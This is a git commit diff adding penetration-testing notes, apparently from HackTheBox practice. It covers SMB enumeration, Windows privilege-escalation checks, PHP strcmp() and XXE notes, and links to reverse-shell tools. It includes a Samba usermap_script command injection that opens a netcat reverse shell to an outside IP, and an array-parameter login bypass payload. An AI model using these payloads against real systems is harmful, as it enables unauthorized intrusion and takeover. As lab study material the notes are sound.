smb exploit
This commit is contained in:
parent
a5b29def31
commit
24937f7d68
File diff suppressed because it is too large
Load Diff
|
@ -1,3 +1,16 @@
|
|||
# SMB
|
||||
|
||||
## SMBClient
|
||||
|
||||
* Use `smbclient` to list the share
|
||||
```sh
|
||||
smbclient -L //$TARGET_IP/
|
||||
```
|
||||
* The protocol might be dated, try
|
||||
```sh
|
||||
smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
|
||||
```
|
||||
|
||||
# smbmap
|
||||
|
||||
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
|
|
@ -70,3 +70,23 @@ wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows
|
|||
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
|
||||
```
|
||||
|
||||
### Scheduled Services
|
||||
|
||||
* Check which services are scheduled via
|
||||
```sh
|
||||
schtasks
|
||||
```
|
||||
* Powershell's equivalent to scheduled tasks therefore is
|
||||
```sh
|
||||
ps
|
||||
```
|
||||
|
||||
## Files
|
||||
|
||||
### Group permissions
|
||||
|
||||
* Check modification permissions on files and if the current user is able to modify via
|
||||
```sh
|
||||
whoami /all
|
||||
icacls <filename>
|
||||
```
|
||||
|
|
|
@ -0,0 +1,11 @@
|
|||
# SMB Exploits
|
||||
|
||||
## usermap_script.rb
|
||||
|
||||
There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
|
||||
Since the automated exploit does not work, log in anonymously without an account and do the following
|
||||
```sh
|
||||
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
|
||||
```
|
||||
A connection to the root shell is provided.
|
||||
|
|
@ -0,0 +1,20 @@
|
|||
# PHP strcmp() bypass
|
||||
|
||||
Given a `strcmp()` of a variable and a POST parameter value that looks like this
|
||||
```php
|
||||
[...]
|
||||
if (strcmp($username, $_POST['username']) == 0) {
|
||||
if (strcmp($password, $_POST['password']) == 0) {
|
||||
[...]
|
||||
```
|
||||
|
||||
If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
|
||||
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
|
||||
```http
|
||||
username=admin&password=admin
|
||||
```
|
||||
|
||||
to
|
||||
```http
|
||||
username[]=admin&password[]=admin
|
||||
```
|
|
@ -8,6 +8,7 @@ There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
|
|||
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
|
||||
|
||||
## Document Type Definition (DTD)
|
||||
|
||||
A DTD defines the structure and the legal elements and attributes of an XML document.
|
||||
|
||||
* Example file content of `note.dtd`
|
||||
|
@ -37,6 +38,7 @@ A DTD defines the structure and the legal elements and attributes of an XML docu
|
|||
```
|
||||
|
||||
## Replacing XML content
|
||||
|
||||
* Name in the example
|
||||
```xml
|
||||
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
# Miscellaneous References
|
||||
|
||||
## Static Binaries
|
||||
[andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git)
|
||||
|
|
|
@ -2,6 +2,7 @@
|
|||
|
||||
[pentestmonkey's PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell.git)
|
||||
[ivak-sincek's php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell.git)
|
||||
[Impacket psexec.py](https://github.com/fortra/impacket/blob/master/examples/psexec.py)
|
||||
|
||||
## Generators
|
||||
|
||||
|
|
Loading…
Reference in New Issue